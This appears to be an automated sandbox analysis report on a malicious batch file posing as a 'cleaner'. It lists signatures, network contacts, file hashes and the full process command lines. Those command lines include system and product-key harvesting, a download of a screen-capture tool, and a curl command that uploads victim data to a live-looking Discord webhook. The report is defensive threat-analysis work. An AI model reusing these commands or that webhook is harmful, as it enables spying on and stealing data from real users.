Analysis Overview
SHA256
ab22ed1dc9c0a8eb99a8d0c4e496671c930e07d57b628da59fc30ad0900c6763
Threat Level: Known bad
The file SchooiCleaner_F1.0.bat was found to be: Known bad.
Malicious Activity Summary
HawkEye
Blocklisted process makes network request
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Gathers network information
Gathers system information
Delays execution with timeout.exe
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-14 13:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-14 13:12
Reported
2024-07-14 13:14
Platform
win11-20240709-en
Max time kernel
37s
Max time network
35s
Command Line
Signatures
HawkEye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\screenCapture.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_F1.0.bat"
C:\Windows\system32\mode.com
mode con cols=80 lines=30
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 437
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ping -4 -n 1 IMKBEUOX | findstr [
C:\Windows\system32\PING.EXE
ping -4 -n 1 IMKBEUOX
C:\Windows\system32\findstr.exe
findstr [
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-RestMethod api.ipify.org
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\system32\ipconfig.exe
ipconfig
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2100.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP"
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
screenCapture.exe screenshot.png
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:13:16.45 \nUsername: Admin \nComputer Name: IMKBEUOX \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.1.81 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\timeout.exe
timeout /t 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:49810 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
Files
memory/2560-0-0x00007FFC87313000-0x00007FFC87315000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvfizt1j.dgv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2560-9-0x0000022C57FF0000-0x0000022C58012000-memory.dmp
memory/2560-10-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp
memory/2560-11-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp
memory/2560-12-0x0000022C585D0000-0x0000022C58792000-memory.dmp
memory/2560-15-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdc7698e710ff3ab8d3082fe5cee6627 |
| SHA1 | ae5d83861547ec78e37c54bc097b395869c25be3 |
| SHA256 | 1089a92b42dcc3f7c6a4f368c7a3adf3fec33096842efb24de04ecd7c96c8dad |
| SHA512 | 08ca96be8fc8e6637de3e12fcea0b622f9858a3c1785ab02426202f1e17c973b1a53676c39dd41dcf755352ef863b1e58e204a8522a3b907267ff3a4b639ecaa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 30d2d4c82b76613c32e68fbc259cacbf |
| SHA1 | 3057fc35febc98a40407d15f62ab2f3a1028a9d8 |
| SHA256 | 97ea1ead9fad2488820c1fcc3dbd163043126d0a64251c8b20aca81a3b6e0dda |
| SHA512 | 6afac1e6a952cd60574b5e776cc7ad13d5ca95d31f3131016daa6a5d814d25d7851ddcba2d3c7b7f2c3c40df16d34b241cebbfa53894fa627952688904325007 |
C:\Users\Admin\AppData\Local\Temp\screenCapture.bat
| MD5 | 7c39bedd33b129b84117cb4e188eb9b6 |
| SHA1 | 43e660c225a60a8327c7ce73ab6abaddcd412122 |
| SHA256 | 2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711 |
| SHA512 | de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP
| MD5 | b4aaae3b532554d0c7bd317d4834ab16 |
| SHA1 | 28c854e399a3993ffd0df37b4385e29b4fe12905 |
| SHA256 | d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62 |
| SHA512 | ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8 |
C:\Users\Admin\AppData\Local\Temp\RES2100.tmp
| MD5 | 2b2865f9b0bc8e1e3427802d123e3f64 |
| SHA1 | b28cf208d8df3252e21e2e76f892a9b54b07971d |
| SHA256 | ba2f0b1e7b61c763391cc592f23028ef43b2310d4e9d5d64244576e336634eb2 |
| SHA512 | d90069d6d0da337b973a80d727d85f4e3604a10fa2464cd02d591904a011472b8d0236ff0f75d3c4cbf7afd2b58006daffc08c9e09a3d21b78dc943a185a836f |
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
| MD5 | c26bbbdf6bae2b13bd931c77944d8f1f |
| SHA1 | 80f13a90b702c99e71d23060af1801a0f1433753 |
| SHA256 | 313028ef89b2462d6afc5446c21c5ed60bdc18d7075c713681bd310622898ffd |
| SHA512 | bb7bd96889c474c29e0504b6751de98069d86fed200ac395e3608af92e59467197e7f63174ad345cfaef8b49eb3cee3c4bbf2dd8b68de6714cf2f85d1b12d447 |
memory/724-63-0x0000000000790000-0x0000000000798000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\screenshot.png
| MD5 | e17e867c13a606881c19af05e2f032c7 |
| SHA1 | 44b4fa7594e0ddea3585b96b5d67fa67a3668cbd |
| SHA256 | 5b8636f0d5ce69f86e8bdf5334d89d1022d2e19edd2216212a921572a9789454 |
| SHA512 | 300454eeccf97c2556f0d2f767a8e76a0cd03a34b62059fa906522f72c122c21719ebb08752d7f2213d857d800fa17666b20f0877d76d814662fbc5bc86c35b2 |
C:\Users\Admin\AppData\Local\Temp\liscense.txt
| MD5 | b77c85675375ed548a4c019ae9ad5eda |
| SHA1 | f1f6559245707e38403b72c57f201784f1086f7d |
| SHA256 | 81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9 |
| SHA512 | 3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef |
C:\Users\Admin\AppData\Local\Temp\dir.txt
| MD5 | 4f7c335086aa1e994a32fa877cbfcdea |
| SHA1 | b1f77e8fda9c6d5792f25de72dd897130604a3e1 |
| SHA256 | af7b33f8b82794179a097fc8bffb2edfdb854e0f0f280c1fe5bc93e8d0b683e2 |
| SHA512 | 657c7d3086a6bd8418d53b43689f416f3e607f5c46c9cc88e4a732319c8901db1417d746b93f65ddeb20f921810ec4ac9464c6e1d2ebabb68ceb685d6166d0cd |
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
| MD5 | 17a00ddef13a77fea662458994164ff5 |
| SHA1 | 529cde1ee203abbc15d8bdc796947a7e3586e531 |
| SHA256 | 8be7fbb0dfd6a6e999ba11ccc08c1883d8884bd9ed5b79f9d0833230c99ab57b |
| SHA512 | f90efbd6ed21c5c4128de7a46ad86cc3bed256d24923f400df2c00bcda7922350977cf21b194167e54c87e6e3b168fa89da97bca8ab14814c4c127709963d805 |
C:\Users\Admin\AppData\Local\Temp\ipconfig.txt
| MD5 | d78118f5f9b8716449d87d231f6993ed |
| SHA1 | d7d2d4783f3d40c5af355091d70f9ad4d4335ab7 |
| SHA256 | c1502b621b88e46f262a466d8bffabef3e7095ff012a0a52fe38ee4343b0c135 |
| SHA512 | cac300ec07dab390ebb3265763a93189c9d91c8ea78c597b077f3bd7ea7ef14a5779233dc053cbb877cf3454c60e0059585aa252903ba6ff297a5d3fe59676c3 |